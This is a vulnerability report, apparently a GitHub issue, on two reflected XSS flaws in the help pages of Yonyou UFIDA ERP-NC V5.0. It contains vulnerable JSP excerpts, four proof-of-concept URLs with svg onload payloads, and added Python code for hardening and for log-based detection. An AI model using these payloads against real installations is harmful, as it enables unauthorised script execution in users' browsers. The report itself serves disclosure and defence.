
Yonyou UFIDA ERP-NC V5.0 /help/systop.jsp and /help/top.jsp Reflected Cross-Site Scripting (XSS) #86

@Hebing123

Description


Summary

This report details two reflected Cross-Site Scripting (XSS) vulnerabilities in Yonyou UFIDA ERP-NC V5.0, located in the /help/systop.jsp and /help/top.jsp pages of the help module. Both pages read the langcode request parameter and write it into the response without validation or output encoding, so an attacker who gets a victim to open a crafted link can execute arbitrary JavaScript in the victim's browser in the context of the ERP-NC site.

Details

/help/systop.jsp

<%String sLangcode = request.getParameter("langcode");%>
···
<SCRIPT language=JavaScript type=text/JavaScript>
  function onclickSearch(){
    var term = document.frm1.term.value;
    if (term!="")
      window.parent.frames['helpfr2'].window.location.href = "Search.jsp?langcode=<%=sLangcode%>&term=" + term;
  }
</SCRIPT>
···
<DIV style="filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src=image/logo_<%=sLangcode%>.png);width:208px;height:47px">

The langcode parameter in /help/systop.jsp is written into the response unchanged in two places: inside a double-quoted JavaScript string literal in the SCRIPT block (the Search.jsp URL built by onclickSearch) and inside the double-quoted style attribute of the logo DIV. Neither site validates or encodes the value. A value containing "> closes the style attribute and lets the attacker append arbitrary HTML, and a value containing </script> terminates the script block regardless of the string literal it sits in, so attacker-supplied script executes as soon as the page is rendered.

/help/top.jsp

<%String sLangcode = request.getParameter("langcode");%>
···
<TD width="50" align=right> <font size="2"><%=nc.bs.ml.NCLangResOnserver.getInstance().getString(sLangcode,"smcomm","","search_find")%></font> 
···
<TD width="80" align=right><font size="2"><%=nc.bs.ml.NCLangResOnserver.getInstance().getString(sLangcode,"smcomm","","displaydir")%></font></TD>
···
<a href="/menu.jsp?datasource=<%=sDatasource%>&langcode=<%=sLangcode%>" target="helpfr2">
···
<DIV style="filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src=image/logo_<%=sLangcode%>.png);width:208px;height:47px"> 

In /help/top.jsp the same parameter is passed to nc.bs.ml.NCLangResOnserver.getInstance().getString() as the lookup language and is also written unencoded into the href attribute of the menu link and into the style attribute of the logo DIV. As in systop.jsp, a value containing "> closes the attribute and injects a new element, and the injected script runs when the page is rendered.
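The reflection and its fix, as an added example that is not part of the original report or of ERP-NC: a Python model of the three output contexts quoted above, the two PoC payload shapes run through them, and a hardened renderer that allowlists langcode and then applies context-specific output encoding. The allowlist pattern, the placeholder datasource value and the simplified tag names are assumptions.

```python
"""
Model of how /help/systop.jsp and /help/top.jsp reflect the langcode parameter,
beside a hardened rendering. Added example for this report, not ERP-NC code:
the templates reproduce only the reflecting lines quoted in the report, and
the langcode allowlist pattern, the placeholder datasource value and the tag
names are assumptions.
"""
import html
import json
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Where each page writes <%=sLangcode%> unencoded. {lc} is the reflection
# point; {ds} stands in for sDatasource, which top.jsp reflects the same way.
TEMPLATES = {
    "systop.jsp:js-string": (
        "<script>window.parent.frames['helpfr2'].window.location.href = "
        '"Search.jsp?langcode={lc}&term=" + term;</script>'
    ),
    "systop.jsp:style-attr": (
        '<div style="filter:progid:DXImageTransform.Microsoft.AlphaImageLoader'
        '(src=image/logo_{lc}.png);width:208px;height:47px">'
    ),
    "top.jsp:href-attr":
        '<a href="/menu.jsp?datasource={ds}&langcode={lc}" target="helpfr2">',
}
TEMPLATE_TAGS = {"script", "div", "a"}

# The two payload shapes from the PoC, decoded once as the servlet container does.
PAYLOADS = [
    unquote("1%22%3E%3Csvg%20onload=alert(1)%3E"),
    unquote("1%22%3E%3C/script%3E%3Csvg%20onload=alert(1)%3E"),
]

# Assumption: legitimate language codes are short alphanumeric tokens.
LANGCODE_RE = re.compile(r"^[A-Za-z0-9_]{1,16}$")


class _TagCollector(HTMLParser):
    """Records every start tag a browser would create from the markup."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def injected_tags(markup):
    """Start tags in the output that the template itself never emits."""
    collector = _TagCollector()
    collector.feed(markup)
    collector.close()
    return [t for t in collector.tags if t not in TEMPLATE_TAGS]


def render_vulnerable(ctx, langcode, datasource="ds1"):
    """Mirrors <%=sLangcode%>: the raw parameter value goes straight into the page."""
    return TEMPLATES[ctx].format(lc=langcode, ds=datasource)


def is_valid_langcode(value):
    """Allowlist check: True only for values shaped like a language code."""
    return bool(LANGCODE_RE.match(value))


def encode_for_context(ctx, value):
    """Output encoding chosen by the context the value lands in."""
    if ctx.endswith(":js-string"):
        # JSON string escaping for a double-quoted JS literal, with < and >
        # written as \u escapes so the text can never contain "</script>".
        return json.dumps(value)[1:-1].replace("<", "\\u003c").replace(">", "\\u003e")
    # HTML attribute value: escape quotes and angle brackets.
    return html.escape(value, quote=True)


def render_hardened(ctx, langcode, datasource="ds1"):
    """Allowlist the parameter first, then encode whatever is emitted."""
    if not is_valid_langcode(langcode):
        raise ValueError("unsupported langcode: %r" % langcode)
    return TEMPLATES[ctx].format(
        lc=encode_for_context(ctx, langcode),
        ds=html.escape(datasource, quote=True),
    )


if __name__ == "__main__":
    for ctx in TEMPLATES:
        for payload in PAYLOADS:
            print(ctx, repr(payload), "->", injected_tags(render_vulnerable(ctx, payload)))
```

The hardened path keeps both checks on purpose: the allowlist rejects anything that is not a language code, and the encoding means that a value which somehow reaches the template still cannot close the attribute or the script block. The script-string context is the one an attribute encoder gets wrong (html.escape leaves a literal </script> intact inside a JS string), which is why the context, not a single global filter, selects the encoder.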

POC

Opening any of the following URLs in a browser executes alert(1). The first payload closes the attribute the value is reflected into; the variant that adds %3C/script%3E also terminates the SCRIPT block in systop.jsp, since a literal </script> in the reflected value ends the block before the browser ever parses the JavaScript string it sits in.

http://target-ip/help/top.jsp?langcode=1%22%3E%3Csvg%20onload=alert(1)%3E
http://target-ip/help/top.jsp?langcode=1%22%3E%3C/script%3E%3Csvg%20onload=alert(1)%3E
http://target-ip/help/systop.jsp?langcode=1%22%3E%3Csvg%20onload=alert(1)%3E
http://target-ip/help/systop.jsp?langcode=1%22%3E%3C/script%3E%3Csvg%20onload=alert(1)%3E
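For detection, as an added example that is not part of the report or of ERP-NC: a scanner over web-server access logs that flags requests to the two pages whose langcode parameter is not a plain language code, decoding the value once the way the servlet container does. The log lines are constructed samples in Combined Log Format and the allowlist pattern is an assumption.

```python
"""
Detection for the PoC requests above: flag hits on the two vulnerable help
pages whose langcode is anything other than a plain language code. Added
example for this report, not ERP-NC or vendor code. The access-log lines are
constructed samples in Combined Log Format, and the allowlist pattern for a
legitimate langcode is an assumption.
"""
import re
from urllib.parse import parse_qs, urlsplit

VULN_PATHS = {"/help/top.jsp", "/help/systop.jsp"}
SAFE_LANGCODE = re.compile(r"^[A-Za-z0-9_]{1,16}$")  # assumed shape of real codes
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log: one benign hit, the two PoC payloads, a hit on a page
# the report does not cover, and a double-encoded probe.
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2024:09:14:02 +0000] "GET /help/top.jsp?langcode=english HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
10.0.0.9 - - [12/May/2024:09:15:40 +0000] "GET /help/top.jsp?langcode=1%22%3E%3Csvg%20onload=alert(1)%3E HTTP/1.1" 200 2351 "-" "Mozilla/5.0"
10.0.0.9 - - [12/May/2024:09:15:41 +0000] "GET /help/systop.jsp?langcode=1%22%3E%3C/script%3E%3Csvg%20onload=alert(1)%3E HTTP/1.1" 200 2360 "-" "Mozilla/5.0"
10.0.0.7 - - [12/May/2024:09:16:03 +0000] "GET /help/Search.jsp?langcode=english&term=invoice HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [12/May/2024:09:17:11 +0000] "GET /help/top.jsp?langcode=%2531%2522%253E HTTP/1.1" 200 2351 "-" "Mozilla/5.0"
"""


def inspect_line(line):
    """Return a finding dict for one log line, or None when it is benign."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    if target.path not in VULN_PATHS:
        return None
    # parse_qs percent-decodes exactly once, which is what the container hands
    # to request.getParameter(); double-encoded input stays encoded and still
    # fails the allowlist because of the '%' characters.
    for value in parse_qs(target.query, keep_blank_values=True).get("langcode", []):
        if not SAFE_LANGCODE.match(value):
            return {
                "ip": line.split(" ", 1)[0],
                "path": target.path,
                "langcode": value,
                "has_markup": any(c in value for c in "<>\"'"),
            }
    return None


def scan(log_text):
    """Findings for every line of an access log, in log order."""
    return [f for f in map(inspect_line, log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Scoping the scan to the two paths named in the report keeps the noise down. Search.jsp also receives langcode (the script in systop.jsp builds that URL), but the report makes no claim about it, so it is deliberately left out of VULN_PATHS.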
